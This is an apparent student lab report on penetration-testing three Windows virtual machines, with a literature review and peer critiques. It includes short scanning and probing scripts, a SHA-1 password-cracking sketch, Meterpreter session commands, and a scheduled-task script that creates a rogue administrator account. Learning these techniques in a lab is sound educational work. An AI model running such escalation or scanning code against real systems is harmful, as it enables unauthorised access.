Abstract
When performing a penetration test on a system, after gathering all the information you can, you will eventually need tools to get through the security protecting your target, and that requires knowledge of the tools and how they work. This lab takes everything done in the previous labs and determines which tools are needed to perform penetration tests on the testing environment that was set up in the first lab. It shows how to use tools to gather information on the operating system, open ports, running applications, and running services on the target computers, and then uses tools to attempt to penetrate the targets through the vulnerabilities that were found. This is the last lab that teaches how to do a penetration test before the acquired skills are used to perform one in a real situation; it wraps up everything learned in the previous labs and puts it to use in penetrating a target system.
Literature Review
In the paper Mobile Test: a tool supporting automatic blackbox tests for software on smart mobile devices, the authors recognize that any intelligent device that runs applications and connects to the Internet could be exploited, so testing must be done on mobile devices as well. Their proposed mobile application testing program, Mobile Test, used a layered design to isolate the specific areas of the system to be tested (Bo, Xiang, & Xiaoping, 2007, p.1). This is very much like the approach taken by the teams, which have been isolating vulnerabilities by categorizing service vulnerabilities and tools by their location in the OSI model. The authors conducted blackbox testing on three different mobile devices, all running Symbian OS 8.0, and did a comparison test with three different tools or methods: Mobile Test, TestQuest Pro, and manual testing (Bo et al., 2007, p.6).
Just as penetration testing needs to be performed on operating systems and user applications, it should also be conducted on security mechanisms. In the paper Firewall Penetration Testing (Haeni, 1997), the author proposes a method for performing penetration tests on firewalls. He suggests that the testing should be done by independent groups that can be trusted for integrity, experience, writing skills, and technical capability, rather than by vendors or hackers. The penetration tests are divided into four steps: indirect information collection, direct information collection, attacks from the outside, and attacks from the inside. The author makes it clear that a penetration test on a firewall, as with a penetration test on anything, should not be treated as an end-all solution. Hackers come up with new ways to break through security barriers every day, so caution must be exercised at all times. This point is worth relating to anyone in charge of maintaining a network: it should be very clear to network administrators and to management that constant testing and maintenance are vital to keeping a network secure.

In the introduction the author explains that, with the introduction of the Internet, anyone around the world can attack a network, and that firewalls were created to block unwanted attacks from the outside. Firewalls should not be the only means of protection, however; proxies and other measures should also be used to keep malicious activity at bay. The author again stresses the importance of not relying completely on the firewall and notes that firewalls must be constantly maintained to keep new attacks from slipping through. To make sure the firewall is secure, penetration tests need to be performed on a regular schedule. The author then explains where a firewall should be located on a network: it should be one of the first devices encountered on the way in, placed between the protected network and either the outside or another untrusted network. I would add that any honeypot networks should not be connected to the production network even behind a properly secured firewall; they should be completely isolated and treated as entirely separate networks.

Next the author explains the difference between packet filtering gateways and application level gateways, both of which are meant to filter unwanted traffic. A packet filter uses header information to decide whether to let a packet through, based on a list of approved and disapproved addresses. An application level gateway, or proxy, uses special-purpose code for each service to allow only selected traffic into the network. The author then gives a fairly complete explanation of how a firewall proxy works, but he seems to use the words firewall and proxy interchangeably. I disagree that these words are the same: a proxy can be used in ways other than as a firewall, so firewall and proxy should not be interchangeable. The author then discusses some failures associated with firewalls, mentioning that a firewall adds to the number of points of failure.
While this may be true, if one means of protection from the outside world goes down, a second system would still keep the network protected. The author also comments that a firewall can be quite costly and can slow down traffic on a network. In the next section the author covers various ways a firewall's reliability could be evaluated, such as relying on firewall vendor information, examining logs, and design analysis, and shows how each would be either too time consuming, too costly, or not secure enough. The one method the author endorses, and the subject of this paper, is firewall testing. He then notes that firewall testing is limited by the scarcity of information and of tools for doing it. This point is largely moot today, since the paper was written back in 1997 and there is now far more information and tooling for firewall penetration testing. The author again argues that independent companies are the best choice for performing penetration tests on firewalls; this may be a fair point, but the paper also looks like it is trying to promote the author's own business.

The author then explains how to perform the penetration test, beginning with setting the rules of engagement. He notes the importance of checking for other access paths into the network that the administration might not be aware of, such as dial-in lines, ISDN connections, or T1 lines, which could be used to bypass the firewall altogether. Logging is also examined: the activity of all connections made to the network needs to be monitored and tied to some alarm. There is a fine balance in how much traffic should be monitored; monitoring too much consumes a great deal of storage and processing power, while monitoring too little allows malicious activity to be overlooked. He also covers whether to tell the administrators about the test, and gives advantages and disadvantages of both choices.

The methodology the author uses to penetration test firewalls is very similar to the methods used in these labs to penetration test computers. He follows the four steps mentioned above: indirect information gathering, direct information gathering, attacks from the outside, and attacks from the inside. Indirect information gathering is a passive attack that collects information without alerting the organization the firewall belongs to; it can include scouring the Internet and e-mail for information as well as simple network tools like nslookup and whois. For direct information gathering, the author uses scanning tools such as SATAN and stealth scanning to find holes in the firewall. He also sends e-mail messages to the company's users to see whether he can get a response from a system containing vital information, and sends FIN and ACK packets to try to draw a response that would tell him the system is listening (a minimal probe sketch is given after this review). Next the author turns to attacks from the outside, which he breaks down into attacks on packet filtering firewalls and attacks on application layer firewalls.
He starts with packet filtering firewalls, attacking the DMZ to see whether access can be gained from there, because the system trusts the DMZ. The author then explains how to perform an IP spoofing attack to gain access to a network behind a firewall. The problem with this today is that it requires flooding a host with packets; this is commonly prevented by the protocols now in place on networks and is a very old method to use. The author also explains non-blind IP spoofing, source porting, and source routing as ways to get through a firewall. As mentioned earlier, these methods will most likely not work on today's networks, because the attacks are patched by default on current systems and will only succeed against systems that have not been updated in the past ten years, which is rarely the case. Next the author covers attacks against application layer firewalls. He proposes an attack that involves taking control of an NTP server, causing the firewall to restart, and feeding the firewall a false time from the NTP server, thus allowing the attacker to reuse passwords gathered from earlier sniffing of the network to gain access. The author also covers policies that should be examined for configuration errors that could lead to security breaches. The author falls short in describing attacks from inside the firewall: he does a nice job explaining why someone would want to attack from the inside, but when it comes to explaining the attacks he simply says there are a lot of tools available to perform them.

In the last part of the paper the author describes how he performed the actual tests. He used automated testing tools but did not rely on them as the only means of evaluating a system, and he makes clear that the more an attacker knows about a system, the better positioned the attacker is to use more direct methods against it. He also notes that hacking tools are becoming easier to find on the Internet; again, this paper was written in 1997, so the tools it mentions are no longer reliable. In the conclusion the author mentions that there is not much information available on performing penetration attacks against firewalls. That statement is no longer true: there is now a great deal of information on firewall penetration testing and on the tools that can be used for it. He also reiterates that a single penetration test does not make a firewall definitively secure and that additional testing needs to be done on the system on a regular schedule. This article is a good introduction to penetration testing, but it should not be used as a guide to actually performing a penetration test on firewalls, because it is old and nearly everything in it is now patched or defended against by default on today's systems.
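To make the direct information-gathering step described above more concrete, the following minimal Python sketch (using the Scapy library, which Haeni's paper does not mention and which is assumed here purely for illustration) sends single FIN and ACK probes toward a placeholder address and reports whether a RST comes back, the kind of response the author uses to infer that a host behind the firewall is reachable and listening. It must be run with root privileges.

from scapy.all import IP, TCP, sr1, conf

conf.verb = 0  # keep Scapy quiet
TARGET = "203.0.113.10"  # placeholder address for a host behind the firewall under test

for flag in ("F", "A"):
    # A FIN or ACK probe that draws back a RST suggests the packet passed the
    # filter and reached a live TCP stack on the other side.
    reply = sr1(IP(dst=TARGET) / TCP(dport=80, flags=flag), timeout=2)
    if reply is not None and reply.haslayer(TCP) and (reply[TCP].flags & 0x04):
        print(f"{flag} probe: RST received, host appears reachable")
    else:
        print(f"{flag} probe: no response, probe likely filtered")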
Since security mechanisms can be tested, so can passwords. The article Ethical Hacking and Password Cracking: a Pattern for Individualized Security Exercises (Snyder, 2006) describes a pattern for creating individualized learning exercises based on password cracking and SHA-1 file hashing. The introduction explains that a quick review of hashing and password concepts will be covered using the author's "SecureS" software system, and makes clear that the material in the paper should be used in an ethical manner; the rest of the introduction gives examples of ethical uses of password cracking. The next section gives the details of the "SecureS" software the author had written, including some of its programs and features. The following section describes what a hashed password is; here the author makes the mistake of repeating a whole paragraph. In describing the different hashing methods, the author leans toward SHA-1 for hashing passwords, and this section also walks through using one of the "SecureS" features to demonstrate the hashing process. In the next section the article gives a good explanation of how passwords are encrypted and how password files containing encrypted passwords can be found on the Internet through simple Google searches, along with a couple of tools that can keep such files from being leaked. The next section takes the gathered password files and shows how tools like John the Ripper crack the encrypted passwords. The problem with all of this is that it requires the person trying to gain access to already have access to the password files. The author then gives an exercise in cracking a set of passwords. One problem with the assignment is that the encrypted password is handed to the student, which makes it a very easy assignment: all that needs to be done is to run the password through John the Ripper. Why not teach the students more about how to gain access to the password file in the first place? The next section of the article gives example code that can guess passwords using a set of parameters embedded in the code. The author comments that "If the password is easily guessed, the password is secure. If the password is not easily guessed, it is more secure" (Snyder, 2006). I would disagree and say that if a password is easily guessed it should not be used and is not secure; if a password is not easily guessed it is secure, and if a password cannot be guessed at all it is a password to rely on (though do not expect to reach that point). The next section of the paper shows how the student goes about completing the exercise. On examination, this does not look like an exercise in how to crack passwords so much as an exercise in how to use John the Ripper and SHA-1 through the author's own application; it could have been expanded upon. The next section describes what the teacher needs to do to set up the exercise, which is done using XML to turn a list of usernames and passwords into a list of encrypted passwords. The rest of the paper gives the results from some students who took the exercises.
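To make the hashing and guessing steps discussed above concrete, here is a minimal Python sketch that hashes a password with SHA-1 and runs a small dictionary attack against it in the spirit of John the Ripper's wordlist mode. The stored hash and the wordlist are invented for illustration and are not taken from Snyder's SecureS software.

import hashlib

# Hypothetical unsalted SHA-1 password hash of the kind the exercise hands out;
# the plaintext behind it is "letmein".
stored_hash = hashlib.sha1(b"letmein").hexdigest()

# A tiny wordlist standing in for a John the Ripper dictionary.
wordlist = ["password", "123456", "qwerty", "letmein", "dragon"]

for guess in wordlist:
    if hashlib.sha1(guess.encode()).hexdigest() == stored_hash:
        print("Password recovered:", guess)
        break
else:
    print("No match found in the wordlist")

Because the hash is unsalted, identical passwords always hash to identical values, which is part of what makes a dictionary attack against a leaked password file practical.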
Penetration testing can be performed on operating systems, user applications, and security mechanisms, so why not test the network itself? In the paper Modeling TCP/IP Networks Topology for Network Vulnerability Analysis (Zakeri et al., n.d.), the abstract explains that the article proposes a model for analyzing TCP/IP networks against attacks. The abstract does a nice job of showing how a TCP/IP network lacks built-in mechanisms for authentication, integrity, and privacy, although it contains some sentences that do not make sense, such as the last one. The introduction does a nice job of explaining that even though one piece of a network might be very secure, if the whole network is not secured then that piece is not as secure as thought. The authors state that because networks are growing rapidly, an automated approach to vulnerability analysis is needed. This is a good counterpoint to what was said in (Haeni, 1997) about automated scans not being a replacement for manual testing: manual testing on a large network could take an infeasible amount of time, and automated tools would alleviate that problem, though it is worth noting that manual testing is still better at discovering hidden vulnerabilities. The authors state that even though systematic approaches are starting to appear, a formal approach is lacking, and this paper aims to provide one. The paper does not cover the physical topology of a network, but extended concepts instead: logical representation of network device interconnections, user access levels on network devices and hosts, services running on network devices and hosts, and the related configuration of network devices. The paper then describes the methodology of the proposed framework, which is divided into two parts: a network topology model and a vulnerability and attack model. Each model is defined in its own section, with every element defined along with what it includes. Using the defined elements, the authors give a mathematical procedure for applying the model to detect vulnerabilities in a network topology; the procedure is technical and needs to be studied to understand how it works. The authors then work through an example to demonstrate the model. The case study includes three hosts on a network: one host is sending information to a second host, while a third host hijacks the information traveling between them using a man-in-the-middle attack. The authors use this case study to show that the model can prove the network is vulnerable.
Because everything on a network, including the network itself, can be tested, there is a need to constantly improve the process of penetration testing. In the paper Attack Net Penetration Testing, the author described a new process model for penetration testing that used the Petri net as its paradigm, because this approach provided increased structure to flaw-generation activities without restricting the free range of inquiry (McDermott, 2001, p.15). Penetration testing usually follows the flaw hypothesis or attack tree approach (McDermott, 2001, p.15), with the attack tree approach intended for penetration testing where there is less background information about the system to be tested (McDermott, 2001, p.16). The author went on to describe an attack net as a Petri net with a set of places representing states or modes of the security-relevant entities of the system of interest (McDermott, 2001, p.16). The attack net also has a set of transitions that represent input events, commands, or data that cause one or more security-relevant entities to change state (McDermott, 2001, p.16). Attack nets are not intended to model the actual behavior of a system or component during an attack, but are used as a notation for discovering and discussing scenarios under development (McDermott, 2001, p.19). They provide a graphical way of showing how a collection of flaws may be combined to achieve a significant system penetration (McDermott, 2001, p.21). The methodology used by the author was to apply an attack net to a case study of a Mitnick attack. The abstract was too short to give a sufficient overview of the paper. This paper relates to the lab exercise in that it gives penetration testers a graphical notation for planning an attack.
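As a rough illustration of the place-and-transition idea described above, the following Python sketch encodes a tiny attack net and fires a transition whenever all of its input places hold tokens. The places and transitions are invented for this example and are not taken from McDermott's paper.

# Places mark the state of security-relevant entities; a token (count > 0)
# means that state currently holds.
places = {"recon_done": 1, "creds_sniffed": 0, "shell_on_host": 0}

# Transitions are events that consume tokens from their input places and
# produce tokens in their output places.
transitions = [
    {"name": "sniff_password", "inputs": ["recon_done"], "outputs": ["creds_sniffed"]},
    {"name": "login_with_creds", "inputs": ["creds_sniffed"], "outputs": ["shell_on_host"]},
]

fired_something = True
while fired_something:
    fired_something = False
    for t in transitions:
        if all(places[p] > 0 for p in t["inputs"]):
            for p in t["inputs"]:
                places[p] -= 1
            for p in t["outputs"]:
                places[p] += 1
            print(f"fired {t['name']}: {places}")
            fired_something = True

A successful penetration corresponds to a firing sequence that ends with a token in a goal place such as shell_on_host, which mirrors how an attack net shows individual flaws being combined into a significant compromise.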
Penetration testing relies heavily on tools to accomplish its tasks; the more tools that are available, the better the testers are at finding vulnerabilities. In the article A Distributed Network Security Assessment Tool with Vulnerability Scan and Penetration Test (Chen, Yang, & Lan, 2007) the authors propose a vulnerability scanning tool that they developed. The abstract starts by explaining why vulnerability testing is important in today's networks and notes that the tool includes network mapping, vulnerability scanning, penetration testing, and intelligent reporting. The introduction explains how tools like Nessus and SATAN produce many false positives or fail to detect vulnerabilities that do exist, and proposes a tool that combines vulnerability scanning with penetration testing to uncover hidden vulnerabilities. This article was written to advertise a particular piece of software, so it needs to be read with caution and with the understanding that there is a bias toward that software. The software has two components, a controller and agents. The controller is a Windows application that sends commands to each agent to perform certain tasks; after the tasks are complete, the agents report their results back to the controller. Each agent can perform network mapping, vulnerability scanning, and penetration testing on various sections of a network. The authors note that the advantage of this software is that it uses penetration testing to confirm the vulnerabilities that are found, which automates the entire vulnerability testing process. The paper then explains the configuration screens in the software, which are separated into agent management and policy management. Agent management is used to configure the agents' IP addresses, ports, and target networks, while policy management is used to configure the network mapping policy, vulnerability scan policy, and penetration policy; the paper defines each of these in more detail, which will not be covered here. The last part describes the reporting component, which gives nice graphical representations of the vulnerability scans and penetration tests that were run against the network. The conclusion again emphasizes how important it is to incorporate penetration testing into vulnerability testing to get accurate results. The problem with this paper is that nowhere does it acknowledge that, even if this piece of software is very accurate and complete, it should not be used on its own to deem a network secure. As the (Haeni, 1997) paper states, security scanners can help in conducting tests but cannot replace manual tests. This tool would be useful in these labs for automating a penetration test against the proposed network, but it should not be the only thing used. One last shortcoming is that the paper never gives the name of the software or says where to get it.
Just as vulnerability scanning can be used for good, by helping IT personnel identify what needs hardening, it can also be used with malicious intent. The article A Taxonomy of DDoS Attack and DDoS Defense Mechanisms pertains to penetration testing because DDoS attacks scan target systems for vulnerabilities to determine whether they can be exploited and commandeered, so that they can then be loaded with attack code and serve as zombies to attack other systems. This can be done manually, semi-automatically, or automatically, depending on the degree of reliance on automation to recruit, exploit, and infect zombie computers (Mirkovic & Reiher, 2004, p.39). Some of the tools used to perform such scans include worms and Trojans (Mirkovic et al., 2004, p.39). Some Trojans can take the form of root kits, which were described in the article Root Kits, an Operating Systems Viewpoint. That article described root kits as tool boxes containing a collection of highly skilled tools for attacking computer systems (Kuhnhauser, 2004, p.12). Root kits perform many of the same functions that the groups performed against their systems, such as analyzing vulnerabilities within the target system, determining which tools would best exploit a vulnerability, and covering up the attacker's footprint on the target system, but they differ in that they do this automatically. Root kits also create backdoors for re-entry into the target systems, which goes beyond the scope of penetration testing. The article appeared to be strictly a secondary-source paper in which the author summarized the characteristics of root kits and the security techniques used to try to counteract these automated tools. Besides using scanning techniques to find recruits, DDoS attacks exploit vulnerabilities in specific protocols or applications on the victim's network or computer system, just like some of the tools the groups have been working with; however, the DDoS attack exploits them only to deny the victim access to those resources. While performing a DDoS attack is an option, the groups are being conditioned to take full control of the target systems.
Methodology
This lab will step through the process of actually performing a penetration test on the three target computers set up in the first lab. The lab will review literature on vulnerability testing, select tools to gather information on the target systems, select tools to perform penetration testing using the gathered information, and discuss what types of biases were found when performing the penetration tests on the three computers.
First in this lab, literature on vulnerability testing will be examined. This literature will aid the group in finding different methods to accomplish the vulnerability tests that are part of this lab. Each article will be examined and reviewed for important information that can be used in this lab, the types of methods that are used, the research that was used in each article, and any errors or omissions in the article.
This group is going to use three Windows environments to perform the penetration testing on: Windows XP SP0, Windows XP SP3, and Windows Server 2003. The first to be tested is Windows XP SP0. This operating system was chosen because it will be the easiest to penetrate, given its lack of patches for the multitude of vulnerabilities in it. The group is starting with the easiest operating system to hone our skills, since neither of us has done anything like this before or has any experience in penetration testing. The Windows XP SP0 system will let us see how a successful penetration test can be done without as much trouble finding holes in the system. The group will then move on to the Windows Server 2003 operating system, because it runs many more services and therefore offers more possible areas in which to discover vulnerabilities. Last, Windows XP SP3 will be tested, because it will be the hardest to get through; its service packs are up to date and the known vulnerabilities are fixed. The operating system used to perform the penetration tests will be BackTrack 3, because most of the tools that will be used are located on it. The penetration testing is not restricted to being performed only from BackTrack 3, however, because some tools operate better in a Windows environment.
The first step in performing a penetration test on a system is to gather information. At the beginning of this lab the objective is to take the first computer that was chosen, in this case the Windows XP SP0 system, and use tools to discover the operating system running on it. The group chose the p0f tool for this task, since it is designed specifically for discovering the operating system of a target computer. The command line that was used was: p0f -i -S -r -p. This command will be run from the BackTrack 3 operating system. The results are discussed below. The group also used Ettercap to confirm the operating systems; the results of those tests are also discussed below.
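For readers unfamiliar with passive fingerprinting, the sketch below uses the Scapy library (assumed to be available; it is not part of p0f) to watch SYN packets and print the fields, such as initial TTL and TCP window size, that tools like p0f compare against their signature database. It is an illustration of the idea, not a reimplementation of p0f, and it needs root privileges to sniff traffic.

from scapy.all import sniff, IP, TCP

def show_fingerprint_hints(pkt):
    # p0f-style passive fingerprinting keys off fields the sender chose itself,
    # such as the IP TTL and the TCP window size of the initial SYN.
    if pkt.haslayer(IP) and pkt.haslayer(TCP):
        flags = pkt[TCP].flags
        if flags & 0x02 and not flags & 0x10:  # SYN set, ACK clear
            print(f"{pkt[IP].src}: ttl={pkt[IP].ttl} window={pkt[TCP].window}")

# Listen passively on the default interface; nothing is sent to the target.
sniff(filter="tcp", prn=show_fingerprint_hints, count=20)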
Next the group examined some tools in BackTrack 3 that could exploit the operating systems identified in the previous exercise, starting with vulnerabilities in the Windows XP SP0 operating system. A couple of tools that were found that could be used to penetrate the operating system were EZpwn and Fast Track. EZpwn and Fast Track are penetration testing tools that run through a list of exploits located in the Metasploit database and look for any exploits that work. The group also manually tried various exploits from Metasploit to try to gain access to the Windows XP SP0 operating system. This process took almost a full day to accomplish, owing to the group's lack of experience in penetration testing and the need to learn each tool we tried to use. The group also tried exploits that did not use tools to gain access to an administrator account from the physical machine. This involved opening a command prompt in a low-permission account, creating a scheduled task that would open an administrator-level command prompt, and adding an administrator-level account with which the group could then log on. This was also tried on the Windows XP SP3 VM with negative results.
Next the group tried to use the same techniques on the Windows Server 2003 SP2 VM. The group again attempted to use EZpwn and Fast Track to exploit the operating system. When these tests did not produce the required results, the group attempted to exploit possibly open ports, such as 21, 135, 137, and 445. Exploits like the ms06-040 exploit were tried against these ports. The group also tried accessing the server under a lower-permission account and gaining access by exploiting the registry to change the configuration of the operating system. Again, because of a lack of experience and knowledge of the tools, the group was limited in what could be done to this operating system.
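Before throwing exploits at specific ports, it helps to confirm which of them actually accept connections. The following minimal Python sketch performs a plain TCP connect check against the ports mentioned above; the target address is a placeholder for the Server 2003 VM, not the address used in the lab.

import socket

TARGET = "192.168.1.20"  # placeholder address for the Windows Server 2003 VM
PORTS = (21, 135, 137, 139, 445, 1025)

for port in PORTS:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(2)
    try:
        sock.connect((TARGET, port))
        print(f"{port}/tcp open")
    except OSError:
        # Either the port is closed (connection refused) or a filter dropped the probe.
        print(f"{port}/tcp closed or filtered")
    finally:
        sock.close()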
The last computer the group examined was the Windows XP SP3 operating system. This operating system was expected to be the hardest to penetrate because of all the patches installed on it to fix vulnerabilities. The group again tried to use EZpwn and Fast Track to open a session to the operating system. Metasploit was updated with the newest exploits and the tests were tried again. The group then used Zenmap and Nessus to do a thorough vulnerability scan of the Windows XP SP3 operating system to uncover any vulnerabilities that might remain with the newest patches installed. Nessus and Zenmap were run several times against the operating system with different configurations and scan types to maximize the chance of discovering vulnerabilities; ACK scans, FIN scans, SYN scans, and others were used with the Zenmap tool. After a complete scan of the operating system was done, the group scoured the Internet for vulnerabilities in the open ports and services running on the Windows XP SP3 operating system. Exploits from Metasploit and elsewhere were used to try to exploit the open ports and services detected by the Nessus and Zenmap scans. As mentioned above, the group also tried to access the computer from a lower-permission account using a scheduled task to open an administrator-level command prompt, but did not succeed.
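The scan types named above differ mainly in which TCP flags the probe carries and in how the replies are interpreted. As a rough illustration, the following Scapy sketch sends single SYN probes the way Zenmap's SYN scan does and classifies the responses; the address and port list are placeholders, and crafting raw packets requires root privileges.

from scapy.all import IP, TCP, sr1, conf

conf.verb = 0  # silence Scapy's per-packet output
TARGET = "192.168.1.30"  # placeholder address for the Windows XP SP3 VM

for port in (123, 135, 137, 139, 445):
    # SYN probe: SYN/ACK back means open, RST means closed, silence means filtered.
    reply = sr1(IP(dst=TARGET) / TCP(dport=port, flags="S"), timeout=2)
    if reply is None:
        print(f"{port}/tcp filtered (no response)")
    elif reply.haslayer(TCP) and (reply[TCP].flags & 0x12) == 0x12:
        print(f"{port}/tcp open (SYN/ACK)")
    elif reply.haslayer(TCP) and (reply[TCP].flags & 0x04):
        print(f"{port}/tcp closed (RST)")
    else:
        print(f"{port}/tcp unexpected response")

A FIN or ACK scan follows the same pattern with flags="F" or flags="A" and different rules for interpreting the replies.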
The results of using the Nessus and Zenmap tools to discover exploitable vulnerabilities were then examined and compared with the way the other operating systems were approached. Last, the group will examine the possibility of exploiting lower OSI layers to gain control of the upper layers of the OSI model. This would give control of the computers from a lower layer, which could be easier to accomplish.
Results
This lab has shown the group what is actually involved in trying to penetrate a computer. The group was at a disadvantage in this lab because of the members' lack of experience in penetration testing. The lab has also shown that when one approach is not working, stepping back from the situation and taking a fresh look at the problem helps in finding new ways of doing things. Another lesson is that a penetration test that does not gain access to a system is not necessarily a failure. If an attempt to gain access through penetration testing fails, that may mean the system is secure enough to keep out someone at the penetration tester's skill level. It does not mean the system is completely secure, because there is no such thing as a totally secure system.
In the first part of the lab, the three computers to be penetrated were tested to see whether they would give up their operating system. After applying p0f and Ettercap, all three returned an operating system, and with both tools the results for all but the Windows Server 2003 SP2 machine were very close. The p0f tool was able to accurately detect both Windows XP VMs and came fairly close on their service packs, while the Windows Server 2003 SP2 VM was detected as a Windows 2000 SP3 machine. The Ettercap program gave somewhat different results from p0f: it also included a couple of the open ports in its results, and it showed both Windows XP VMs as either Windows XP Pro or Windows 2000 Pro without revealing the service pack of either one. Ettercap got the Windows Server 2003 SP2 machine completely wrong, showing it as an unidentified Linux machine. The results of these findings are shown in figures 1 through 4 below.
Next the group tried to penetrate the operating systems using the knowledge gained passively in the previous exercise. First the Windows XP SP0 machine was examined and a penetration test was performed on it; this operating system was chosen because of its lack of patches for known vulnerabilities. One tool that proved valuable in trying to exploit these computers was the Metasploit Framework version 3, which allowed the group to quickly try many exploits against the various machines. Other tools we discovered that automated the penetration testing and eliminated a lot of work were EZpwn and Fast Track. These tools perform a vulnerability test on the computer and apply exploits from the Metasploit Framework version 3 to see whether any of them open a session to that computer. The EZpwn autopwn tool was used against the Windows XP SP0 machine and a session was established using the ms03_026_dcom exploit. The session was opened with the "session -i 1" command, a channel was created with "execute -f cmd -c", and the connection was started with "interact 1". This gives a command prompt in the Windows XP SP0 shell where a file could be placed, a file could be deleted, or any other malicious activity could take place. A screenshot of this is given in figure 5. Other methods of gaining access without using a tool were also examined. One exploit involved creating a batch file containing a single command, "Command", in a lower-permission account. This batch file was then used to create a scheduled task that opened an administrator command prompt one minute after the task was created. From that command prompt an administrator-level account was created to gain administrative privileges. This test was successful on the first day it was tried, but was not successful after that.
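A minimal sketch of the scheduled-task escalation described above is shown below, assuming a Windows XP era target where the at scheduler runs jobs as SYSTEM. The account name and password are placeholders, and this is an illustration of the technique rather than the exact batch file the group used.

import subprocess
from datetime import datetime, timedelta

# Run from the low-permission account on the target. On Windows XP the "at"
# scheduler executes jobs as SYSTEM, so a scheduled command can create an
# administrator-level account even though the calling account cannot.
run_at = (datetime.now() + timedelta(minutes=1)).strftime("%H:%M")

subprocess.run(
    f'at {run_at} cmd /c "net user pentest P@ssw0rd1 /add '
    f'&& net localgroup administrators pentest /add"',
    shell=True,
    check=True,
)
print(f"Task scheduled for {run_at}; log on as 'pentest' once it has run.")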
Next the group attempted to gain access to the Windows Server 2003 SP2 machine using the techniques above and more. When the EZpwn and Fast Track tools were run against the Windows Server 2003 machine, no sessions were established. Examining the output from EZpwn and Fast Track, the group was able to gather some information on which ports were open and which services were available: ports 21, 135, 139, 445, and 1025 were discovered to be open. Scouring the Internet, the group found some vulnerabilities affecting these ports, and they were exploited using the Metasploit Framework 3, but none of the exploits yielded an open session to connect to. Other tools were examined and tried against the operating system to produce some type of connection, but none succeeded; among the tools tried were Medusa, Hydra, Brutus, and a few others.
Last, the Windows XP SP3 operating system was tested. This operating system was the hardest to penetrate because of the number of patches installed to fix vulnerabilities. Like the other operating systems, it was tried with EZpwn and Fast Track. After that, a thorough scan of the Windows XP SP3 operating system was done using both Nessus and Nmap. These scans were run several times using different scan types, including SYN packet scans, FIN packet scans, ACK packet scans, and others. The only ports discovered to be open were ports 123 and 137; other ports were detected but reported as filtered. The group scoured the Internet for vulnerabilities in these ports and came up short, as the vulnerabilities that were found had already been patched.
Looking at the results of these penetration tests, even though Nessus and Nmap were used, these tools did not provide enough information to exploit two of the three systems. A plan that was put together to penetrate one system did not work on the next, because that system was better secured.
Examining the tools and exploits used to perform these penetration tests, almost all of them operate at layers 6 and 7, meaning that most attacks on a computer are carried out from the application layer. This suggests that organizations concentrate on securing the upper layers of a system and do not treat security at the lower layers as a great threat. If that is the case, then an attack crafted at the lower layers would meet less resistance, and an infection introduced at a lower layer will naturally travel up the OSI model. For example, if the data in a packet is altered at a lower layer and sent on, the other layers are going to trust that packet, because of the protocols already attached to it, and let it through to the upper layers. This can be alleviated by using encryption at almost every layer, although that amount of encryption can hinder speed.
Issues
Many issues were encountered in performing this lab. Throughout the lab it was discovered that a lot of tools did not accomplish what we expected them to do. A lot of time was spent learning how to use the selected tools and even learning how to install tools that were not already installed. Most of the remaining time was spent examining and researching which vulnerabilities could be used to exploit the systems. The lab was also limited by the amount of time that was allotted; with enough time to work on a system like Windows XP SP3, the group might have discovered some way to gain access to it. Another hindrance was the group members' lack of knowledge of penetration tools, Linux environments, and how penetration tests are done, which greatly contributed to not succeeding in penetrating the computers.
Conclusion
By trying to exploit Windows XP Service Pack 0, Windows XP Service Pack 3, and Windows Server 2003, group four found that Windows XP Service Pack 0 was relatively simple to exploit. The other two operating systems were virtually impossible to exploit using script-kiddie tools; the service packs installed on these systems have hardened them by closing the vulnerabilities those tools rely on. This lab was ultimately a lesson in trial and error with the tools. Though several of the tools did not work, this was still a good learning experience, for now we know many approaches that will not successfully exploit a system.
References
Bo, J., Xiang, L., & Xiaoping, G. (2007). Mobile test: A tool supporting automatic blackbox tests for software on smart mobile devices. IEEE.
Chen, S., Yang, C., & Lan, S. (2007). A distributed network security assessment tool with vulnerability scan and penetration test.
Haeni, R. (1997). Firewall penetration testing.
Kuhnhauser, W. (2004). Root kits, an operating systems viewpoint.
McDermott, J. P. (2001). Attack net penetration testing.
Mirkovic, J., & Reiher, P. (2004). A taxonomy of DDoS attack and DDoS defense mechanisms. ACM.
Snyder, R. (2006). Ethical hacking and password cracking: A pattern for individualized security exercises. ACM.
Zakeri, R., Shariari, H., Jalili, R., & Sadoddin, R. (n.d.). Modeling TCP/IP networks topology for network vulnerability analysis.
The abstract presented by team four explains what will be accomplished in the lab, but it does not meet the length requirement of the syllabus; anything less than two paragraphs will be judged as poor scholarship. They explain how lab six will be the last "learning" lab. I disagree: performing a live penetration test in this setting is still a learning exercise and a capstone to the course.

The literature review presented by team four is nothing more than an APA-cited list of reviewed articles. They have three extremely long paragraphs in their literature review with very few citations, which makes the review very hard to read and comprehend. Considering the entire literature review, team four does not present a review that is scholarly or academic; they do not show the overall state of the literature, nor do they do an effective job of tying the literature reviewed into the lab report process. The length of the literature review, however, is impressive.

The methods section presented by team four does explain the process they will follow to complete the lab, though they list steps that should actually have been in the findings section. Team four decided to penetrate all of the Windows VMs that are part of our lab; unlike the other teams, they do not even attempt to show anything related to the Linux machine in the lab environment. Because teams two, three, and five at least paid some respect to the Linux machine, this calls into question the results provided by team four. The methods section does a good job of explaining the how of what they will be performing, but it fails to mention the when, what, and why, which are very important parts of an academic and scholarly methodology. Team four explains that they used p0f and Ettercap to fingerprint their machines, but they fail to mention how they generated the packets used to actually fingerprint the machines, which is questionable.

In the findings section of the lab they first list their lack of overall experience; this is a mistake, as that information should be in the issues section. The use of tools other than just Metasploit was a very nice touch, as most of the other teams just worked with Metasploit. They explain that because most exploits target the higher layers of the OSI model, organizations are concerned only with protecting their data at the higher layers. I have to disagree with that statement: organizations are worried about the security of their information; the layers of the OSI model never come into the picture.

The issues that team four list are very accurate and complete, unlike the issues presented by teams one and three; they actually list the inability to exploit two of their systems as an issue. Of course, they do list a lack of experience as one of their issues. I do not believe this should be the case: after performing enough research, and as we are reaching the end of this course, there should not be any issues as far as experience goes. I agree with team four's conclusions.
Group 4’s literature review, while quite lengthy, still doesn’t properly compare and contrast the literature to the lab activities. Each paper is given a paragraph that is, in most cases, a summary of the paper’s main ideas. The “Firewall Penetration Testing” paper was given a very extensive overview, but only one reference was made to the current lab.
